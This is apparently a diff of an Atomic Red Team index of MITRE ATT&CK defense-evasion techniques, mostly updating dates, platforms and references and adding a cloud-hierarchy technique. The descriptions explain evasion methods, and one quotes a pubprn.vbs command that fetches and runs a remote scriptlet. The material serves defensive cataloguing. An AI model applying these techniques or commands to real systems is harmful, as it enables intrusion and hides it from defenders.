     - name: chmod - Change file or folder mode (numeric mode)
@@ -976,7 +991,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -995,7 +1010,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -1085,7 +1099,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -1143,12 +1156,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -1174,11 +1262,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -1223,12 +1310,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1299,11 +1385,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1371,7 +1456,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1402,7 +1486,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1439,13 +1523,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1546,7 +1628,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1577,7 +1658,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1611,8 +1692,6 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests:
     - name: Sudo usage
@@ -1660,7 +1739,7 @@ defense-evasion:
           sudo visudo -c -f /etc/sudoers
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1712,12 +1791,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1797,12 +1875,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1821,7 +1898,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1835,7 +1911,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1862,8 +1937,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1894,7 +1969,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1951,7 +2027,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -2004,7 +2079,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -2020,11 +2095,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -2070,8 +2144,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -2081,9 +2155,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests:
     - name: Execute a process from a directory masquerading as the current parent
@@ -2135,7 +2208,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -2159,8 +2232,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -2224,11 +2295,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -2249,8 +2319,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -2294,12 +2364,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -2319,9 +2388,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2341,9 +2415,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2360,6 +2433,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2393,7 +2470,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2443,7 +2519,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2471,8 +2547,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2515,7 +2589,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2539,12 +2613,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2634,13 +2706,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests:
     - name: Detect Virtualization Environment (MacOS)
@@ -2681,7 +2752,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2706,8 +2777,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests:
     - name: rm -rf
@@ -3079,7 +3148,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -3105,8 +3174,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -3158,18 +3225,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -3185,8 +3251,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -3200,7 +3266,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -3226,6 +3292,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -3253,12 +3323,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
